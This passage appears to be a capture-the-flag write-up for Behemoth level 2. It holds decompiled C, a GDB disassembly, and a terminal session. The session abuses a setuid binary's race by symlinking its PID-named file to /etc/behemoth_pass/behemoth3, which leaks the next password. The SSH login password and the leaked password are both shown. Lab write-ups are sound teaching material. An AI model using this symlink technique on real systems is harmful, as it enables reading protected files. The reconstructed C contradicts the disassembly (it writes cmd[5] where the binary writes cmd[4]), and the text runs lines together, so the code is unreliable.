behemoth - 02

#include <stdio.h>#include <unistd.h>#include <sys/stat.h>int main(int argc, char *argv[]){struct stat filestat;char cmd[16];char *ptrpid = cmd + 6;pid_t pid;pid = getpid();sprintf(cmd, "touch %d", pid);if (lstat(ptrpid, &filestat) & 0xf000 != 0x8000) {unlink(ptrpid);system(cmd);}sleep(2000);*(int *)cmd = 0x20746163; /* "cat " */cmd[5] = '\0';cmd[5] = ' ';system(cmd);return 0;}

栈环境

root@today:~# ssh behemoth2@178.79.134.250behemoth2@178.79.134.250's password: eimahquuofbehemoth2@melinda:~$ cd /tmp/shui2behemoth2@melinda:/tmp/shui2$ lsbehemoth2@melinda:/tmp/shui2$ /behemoth/behemoth2 > passs.txt &[1] 32634behemoth2@melinda:/tmp/shui2$ ls32634  passs.txtbehemoth2@melinda:/tmp/shui2$ rm -f 32634behemoth2@melinda:/tmp/shui2$ ln -sf /etc/behemoth_pass/behemoth3 32634behemoth2@melinda:/tmp/shui2$ lltotal 1692drwxrwxr-x    2 behemoth2 behemoth2    4096 Feb 18 04:52 ./drwxrwx-wt 9354 root      root      1724416 Feb 18 04:52 ../lrwxrwxrwx    1 behemoth2 behemoth2      28 Feb 18 04:52 32634 -> /etc/behemoth_pass/behemoth3-rw-rw-r--    1 behemoth2 behemoth2       0 Feb 18 04:51 passs.txtbehemoth2@melinda:/tmp/shui2$ ./sleep.sh ...sleep 2409 sec.sleep 2410 sec.sleep 2411 sec.^C[1]+  Done                    /behemoth/behemoth2 > passs.txtbehemoth2@melinda:/tmp/shui2$ ls32634  passs.txt  sleep.shbehemoth2@melinda:/tmp/shui2$ cat passs.txt nieteidiel

   ┌─────────────────────────────────────────────────────────────────────────────────┐   │0x804856d <main>        push   %ebp                                              │   │0x804856e <main+1>      mov    %esp,%ebp                                         │   │0x8048570 <main+3>      and    $0xfffffff0,%esp                                  │   │0x8048573 <main+6>      sub    $0xa0,%esp                                        │   │0x8048579 <main+12>     mov    %gs:0x14,%eax                                     │   │0x804857f <main+18>     mov    %eax,0x9c(%esp)                                   │   │0x8048586 <main+25>     xor    %eax,%eax                                         │   │0x8048588 <main+27>     call   0x8048410 <getpid@plt>                            │   │0x804858d <main+32>     mov    %eax,0x1c(%esp)                                   │   │0x8048591 <main+36>     lea    0x24(%esp),%eax                                   │   │0x8048595 <main+40>     add    $0x6,%eax                                         │   │0x8048598 <main+43>     mov    %eax,0x20(%esp)                                   │   │0x804859c <main+47>     mov    0x1c(%esp),%eax                                   │   │0x80485a0 <main+51>     mov    %eax,0x8(%esp)                                    │   │0x80485a4 <main+55>     movl   $0x804870c,0x4(%esp)                              │   │0x80485ac <main+63>     lea    0x24(%esp),%eax                                   │   │0x80485b0 <main+67>     mov    %eax,(%esp)                                       │   │0x80485b3 <main+70>     call   0x8048450 <sprintf@plt>                           │   │0x80485b8 <main+75>     lea    0x38(%esp),%eax                                   │   │0x80485bc <main+79>     mov    %eax,0x4(%esp)                                    │   │0x80485c0 <main+83>     mov    0x20(%esp),%eax                                   │   │0x80485c4 <main+87>     mov    %eax,(%esp)                                       │   │0x80485c7 <main+90>     call   0x80486c0 <lstat>                                 │   │0x80485cc <main+95>     and    $0xf000,%eax                                      │   │0x80485d1 <main+100>    cmp    $0x8000,%eax                                      │   │0x80485d6 <main+105>    je     0x80485f0 <main+131>                              │   │0x80485d8 <main+107>    mov    0x20(%esp),%eax                                   │   │0x80485dc <main+111>    mov    %eax,(%esp)                                       │   │0x80485df <main+114>    call   0x8048400 <unlink@plt>                            │   │0x80485e4 <main+119>    lea    0x24(%esp),%eax                                   │   │0x80485e8 <main+123>    mov    %eax,(%esp)                                       │   │0x80485eb <main+126>    call   0x8048420 <system@plt>                            │   │0x80485f0 <main+131>    movl   $0x7d0,(%esp)                                     │   │0x80485f7 <main+138>    call   0x80483e0 <sleep@plt>                             │   │0x80485fc <main+143>    lea    0x24(%esp),%eax                                   │   │0x8048600 <main+147>    movl   $0x20746163,(%eax)                                │   │0x8048606 <main+153>    movb   $0x0,0x4(%eax)                                    │   │0x804860a <main+157>    movb   $0x20,0x28(%esp)                                  │   │0x804860f <main+162>    lea    0x24(%esp),%eax                                   │   │0x8048613 <main+166>    mov    %eax,(%esp)                                       │   │0x8048616 <main+169>    call   0x8048420 <system@plt>                            │   │0x804861b <main+174>    mov    $0x0,%eax                                         │   │0x8048620 <main+179>    mov    0x9c(%esp),%edx                                   │   │0x8048627 <main+186>    xor    %gs:0x14,%edx                                     │   │0x804862e <main+193>    je     0x8048635 <main+200>                              │   │0x8048630 <main+195>    call   0x80483f0 <__stack_chk_fail@plt>                  │   │0x8048635 <main+200>    leave                                                    │   │0x8048636 <main+201>    ret                                                      │   └─────────────────────────────────────────────────────────────────────────────────┘